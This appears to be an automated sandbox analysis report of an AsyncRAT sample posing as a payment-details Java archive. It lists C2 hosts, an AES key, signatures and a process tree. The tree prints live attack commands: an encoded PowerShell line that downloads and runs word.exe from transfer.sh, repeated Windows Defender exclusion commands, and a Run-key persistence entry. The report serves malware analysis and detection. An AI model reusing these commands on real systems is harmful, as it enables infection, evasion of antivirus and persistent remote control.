Analysis

  • max time kernel
    83s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-03-2021 16:49

General

  • Target

    Payment Details_ 11-03-21.jar

  • Size

    207KB

  • MD5

    10c6eea1c0cfcc698b01deb033d04f83

  • SHA1

    25815e3b45373b89d332fa42fe36a26d7d20c4db

  • SHA256

    702d843adb5178c567c92fcb19571a7d0b8ce1f6ec08e0a82ba6eb2c37026a62

  • SHA512

    01ae4d3dd3a475db95fb1c32e6f6737e5ca06c582179823c8313624b8532fdc7a7c23104eea01f2af70a873757b647977839373aeaf1c6b75bd413a22909584e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://transfer.sh/get/dsN3t/word.exe

Extracted

Family

asyncrat

Version

0.5.7B

C2

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:49703

chongmei33.publicvm.com:49746

185.165.153.116:2703

185.165.153.116:49703

185.165.153.116:49746

54.37.36.116:2703

54.37.36.116:49703

54.37.36.116:49746

185.244.30.92:2703

185.244.30.92:49703

185.244.30.92:49746

dongreg202020.duckdns.org:2703

dongreg202020.duckdns.org:49703

dongreg202020.duckdns.org:49746

178.33.222.241:2703

178.33.222.241:49703

178.33.222.241:49746

rahim321.duckdns.org:2703

rahim321.duckdns.org:49703

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    hGScKRB0VrlS4WpFo0N7AmnZQApV4qsi

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    FEB

  • host

    chongmei33.publicvm.com,185.165.153.116,54.37.36.116,185.244.30.92,dongreg202020.duckdns.org,178.33.222.241,rahim321.duckdns.org,79.134.225.92,37.120.208.36,178.33.222.243,87.98.245.48

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    2703,49703,49746

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Windows security bypass 2 TTPs
  • Async RAT payload 4 IoCs
  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

  • Windows security modification 2 TTPs 11 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\Payment Details_ 11-03-21.jar"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3116
    • C:\Users\Admin\4F8spyqvE4Bt.exe
      C:\Users\Admin\4F8spyqvE4Bt.exe
      2⤵
      • Executes dropped EXE
      • Windows security modification
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2272
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2112
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2056
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:188
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4504
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4932
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4976
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4280
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5092
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5124
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5172
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5584
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5748
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5916
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5356
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5452
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5680
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5964
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6856
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6948
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:7000
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6212
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6352
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\XTKhkdsbOeosQyZPOlewDRV\svchost.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:6120
      • C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe
        "C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:6372
        • C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\9e34faa5-6f8f-44c8-897d-5296352490a6\AdvancedRun.exe" /SpecialRun 4101d8 6372
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:6912
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\4F8spyqvE4Bt.exe" -Force
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:996
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout 1
        3⤵
          PID:6768
          • C:\Windows\SysWOW64\timeout.exe
            timeout 1
            4⤵
            • Delays execution with timeout.exe
            PID:7092
        • C:\Users\Admin\4F8spyqvE4Bt.exe
          "C:\Users\Admin\4F8spyqvE4Bt.exe"
          3⤵
            PID:6780
          • C:\Users\Admin\4F8spyqvE4Bt.exe
            "C:\Users\Admin\4F8spyqvE4Bt.exe"
            3⤵
              PID:4524
            • C:\Users\Admin\4F8spyqvE4Bt.exe
              "C:\Users\Admin\4F8spyqvE4Bt.exe"
              3⤵
                PID:780
              • C:\Users\Admin\4F8spyqvE4Bt.exe
                "C:\Users\Admin\4F8spyqvE4Bt.exe"
                3⤵
                  PID:7104
                • C:\Users\Admin\4F8spyqvE4Bt.exe
                  "C:\Users\Admin\4F8spyqvE4Bt.exe"
                  3⤵
                    PID:6264
                  • C:\Users\Admin\4F8spyqvE4Bt.exe
                    "C:\Users\Admin\4F8spyqvE4Bt.exe"
                    3⤵
                      PID:6556
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 2712
                      3⤵
                      • Program crash
                      PID:3908
                  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\8CVQO3.xlsm"
                    2⤵
                    • Checks processor information in registry
                    • Enumerates system info in registry
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:2296
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBkAHMATgAzAHQALwB3AG8AcgBkAC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXAB3AG8AcgBkAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdwBvAHIAZAAuAGUAeABlAA==
                      3⤵
                      • Process spawned unexpected child process
                      • Suspicious use of WriteProcessMemory
                      PID:4344
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBkAHMATgAzAHQALwB3AG8AcgBkAC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXAB3AG8AcgBkAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAdwBvAHIAZAAuAGUAeABlAA==
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4700
                        • C:\Users\Admin\AppData\Roaming\word.exe
                          "C:\Users\Admin\AppData\Roaming\word.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5456
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audio driver" /t REG_SZ /d "C:\Users\Admin\Driver auto updater.exe"
                            6⤵
                              PID:6204
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audio driver" /t REG_SZ /d "C:\Users\Admin\Driver auto updater.exe"
                                7⤵
                                • Adds Run key to start application
                                PID:6612
                            • C:\Users\Admin\AppData\Roaming\origx.exe
                              "C:\Users\Admin\AppData\Roaming\origx.exe"
                              6⤵
                                PID:3436
                              • C:\Users\Admin\Driver auto updater.exe
                                "C:\Users\Admin\Driver auto updater.exe"
                                6⤵
                                  PID:3796
                                  • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
                                    "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
                                    7⤵
                                      PID:5376

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\4F8spyqvE4Bt.exe
                          MD5

                          ad8419daca748a16ae9eb38c74e7cf9b

                          SHA1

                          3ea138f11cc51fa421839a505bc869ec3eb3b5db

                          SHA256

                          a5098d0d640ceee9650cdbdf2b7dc300f9852620307c3f67b37752222716a3fc

                          SHA512

                          a333f28922cabb59dbd204f58e4291120d7d23b6786970de5f27c7dfbe8acb0bf47ff2abccfd455cc18e17686509e49949aeb04fbd42de0946c97594e1f24d5b

                        • C:\Users\Admin\8CVQO3.xlsm
                          MD5

                          7246f57d869fefa7d9d0505bbdf5ceff

                          SHA1

                          d20bace71966f4160a6afcb6ade687bddd313bac

                          SHA256

                          340e3184edceed4d23fd81d82a900977f32134328803096c5f5712482e4ed6f6

                          SHA512

                          4a524d82ad45c779507d0078f43d5fd51c935e96fc8742e10b2a557202770eaff46e5723af7d91366c44d23c4efd06fc7a2a95295e9f3e6914cf265aa1e06801

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                          MD5

                          db01a2c1c7e70b2b038edf8ad5ad9826

                          SHA1

                          540217c647a73bad8d8a79e3a0f3998b5abd199b

                          SHA256

                          413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

                          SHA512

                          c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          5d29bc7ef5b070f2482ff2f0826bd04f

                          SHA1

                          51c7cf3a7f2c8231b512602358d23ef9728b38ac

                          SHA256

                          d3a46bebbc53d9d96ccb4e581cbd4d2aa9fd645bbc657ebd13047e126459a0c5

                          SHA512

                          0f8382ae3f30c9a3d70750b8484fe9ee7bf6fff80dc67ead32ce0dffe33442d2e84ff0930f4f129ec0266abfecf64d924987e4e45838ba1fe95184d12b22c188

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          d79e24660ff51dec8ced1f1c3633a115

                          SHA1

                          48470d0441143b1b95871c370627e80e03bc017f

                          SHA256

                          d8a441948b2bab2a1fbaab7a6069b3f81af46b5cd96b711d7860cf0e0ddb7708

                          SHA512

                          e496c4e2c8b5cdef6838f732cba78064b069dbd7c0924abddc1d3b49db6158fd2f432a4e5862f49b83b29cba098420935ebdfed4fd502d729552899da41030d1

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          fbb8f89b428393287ff4a30424a0b6dd

                          SHA1

                          22ce47d0d3b9990e2de45dab63536954d12abc18

                          SHA256

                          5dc2950743d5773246c189ac2318b714d91fdfd899e9e2bc8b7f472e2c84838f

                          SHA512

                          cc707a1b5cf24b07bbe92572658f97b0490b2e1d082109806d11b61bc359e3ad0ef9de536a9e62f9ae1240e8f26f0320d96dabfcc14f2fd3923740007e83f2ab

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          fbb8f89b428393287ff4a30424a0b6dd

                          SHA1

                          22ce47d0d3b9990e2de45dab63536954d12abc18

                          SHA256

                          5dc2950743d5773246c189ac2318b714d91fdfd899e9e2bc8b7f472e2c84838f

                          SHA512

                          cc707a1b5cf24b07bbe92572658f97b0490b2e1d082109806d11b61bc359e3ad0ef9de536a9e62f9ae1240e8f26f0320d96dabfcc14f2fd3923740007e83f2ab

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          84b06ea369259691fd9024902c67d286

                          SHA1

                          8a6cf517349a467c26e9f23940fad005b9ac3716

                          SHA256

                          b81a92259ac1ce9d838da7acc9359d2d2d91814b800c4e1350b69f89fa3a3d14

                          SHA512

                          68d0d116b46429a53eadd3668cbb4b577792619f265befb73fbd7f3780b528062989395f0ddfdc1e28efdef4c5b594d8425fc6f49e66509ad5996f7a3a35c6a7

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          84b06ea369259691fd9024902c67d286

                          SHA1

                          8a6cf517349a467c26e9f23940fad005b9ac3716

                          SHA256

                          b81a92259ac1ce9d838da7acc9359d2d2d91814b800c4e1350b69f89fa3a3d14

                          SHA512

                          68d0d116b46429a53eadd3668cbb4b577792619f265befb73fbd7f3780b528062989395f0ddfdc1e28efdef4c5b594d8425fc6f49e66509ad5996f7a3a35c6a7

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          e43ae9c033c671769230ae65018820e8

                          SHA1

                          8ec7a0f9989b16cea8c356e874ce15744238c851

                          SHA256

                          47afdf03c6f618320b863a82b9e69b20e6cc715a3c81776a0f06e05ddc3ebb80

                          SHA512

                          379204cd9dc14e534e438d618a39fce3cf1ea94f78567f64b6732c21c587ae13ac26436242a08a5acf36fd93148a04412a503b5c4e2d583a84126f9dac33fe6f

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          1930d423571df9735951bf9042b858e0

                          SHA1

                          fd99eb6f52bba81d96a07b3c8ca4b44b9e0261e6

                          SHA256

                          7da05819d484e7c4a134a6c7d3253b6fc9eca3a38aecab94475e03d106ff77ad

                          SHA512

                          2af904b9c273357f19f653dfa1fa27267485bd064037519fd42af327824a11c04e057615d378af6f962042837ca6428a8fe589adc7cb2b0f2944c023cae64a5a

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                          MD5

                          35e067820e0c7f38b4ad029301093c15

                          SHA1

                          0b38740653a2aac0a8b34bdd49bd9ba592c8528e

                          SHA256

                          48b235d6b6509434ea0cb2488fad83494ad586a50775388912a9fdde7c44cda2

